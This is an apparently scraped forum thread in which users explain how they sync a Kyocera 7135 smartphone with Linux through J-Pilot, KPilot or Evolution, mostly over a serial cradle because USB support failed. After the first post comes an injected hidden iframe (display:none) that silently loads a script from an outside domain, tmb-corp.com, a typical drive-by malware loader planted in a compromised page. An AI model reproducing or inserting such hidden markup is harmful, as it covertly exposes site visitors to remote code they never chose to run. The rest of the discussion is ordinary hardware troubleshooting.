What did you do to get your 7135 working in Linux?

I'm trying to get mine to work, but as a Linux NOOB, I can't figure out how. I've tried to follow some of the steps in a couple of posts on the forum but to no avail. Could anybody give a step by step?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have done this in the past but as fate would have it - it works better for my schedule to have it connected to my windows / Groupwise system at the office. FYI I use only one windows box out of the 5 that I call my own - And then I only do 3 things with it. This being one of them. Figures eh

With my 6035 I would sync at the office on windows and at home on my main Mandrake box. With the advent of backing up to an SD chip and the upgrade of my main box here at home to the latest release I haven't done that for about a year.

Overall its pretty easy really - there are packages for both KDE and Gnome and they are usually part of the standard install on any of the recent distrobutions (one of the things I love about Linux is that it generally has everything you need out of the "box"). Look in the Office or Applications sections of your menu. If you attach the cradle to com1 they will probably work without any issue. I have not attempted setting up the USB 7135 cradle but it should also work just fine.

Most of the setup was simmilar to windows in that it involved deciding on what port to hook the cradle to and then choosing the correct device in the software.

There are numerous "Howto's" out there if you do a quick Google. Also if you are using KDE there is a pretty good manual for Kpilot in the standard online documentation app. (The icon looks like a little lifesaver)

I might be able to be a bit more specific if I knew what Distro you use and what window manager you like.

Free your OS and your mind will follow!

7135, linux and J-Pilot

I sync my 7135 with two linux boxes (I use RedHat, but it should make no difference.) I use J-Pilot (http://www.jpilot.org/) and the serial connector (rather than USB.)

You can do all sorts of things to connect various pilot databases to various linux apps, but I do none of them. You can get USB to work if you hold your mouth right, but I don't bother. One caveat for using J-Pilot is that if you use the included time-sync conduit you can potententialy corrupt your address book and require a hard reset. Since the 7135 sets its time from your wireless network you should never need to sync it to your linux clock anyway.

Linux USB for 7135

I have been unable to get the 7136 to work via USB in either RH9 or SuSE 9. I have seen other users hack the visor.h/.c files and add the vendor ID and string to the code and then the driver will pick up the phone, but I have not heard of these attemps working.
I joined this forum to solve this problem, so if anyone out there has gotten the 7135 to sync via USB, please advise!
Thanks!
John Pappas

PS I have gotten it to work via IR (Slow, but works).

I've been using my 7135 with Mandrake for over a year now & it works great. I use the serial connection on Com1 & have pretty good results syncing w/ Evolution.

When I first set it up, I tried the above mentioned hack of the USB files, with no luck. Of course, I was probably among the earliest users of the 7135, so not much was available. I haven't looked in awhile, but you may wish to peek at the USB devices lists and google it to see if there's new info.

USB definately senses the device, but doesn't know what to do with it.

Serial is pretty good for me, anyway.

Good luck .. and please do post what you find if you have different results.
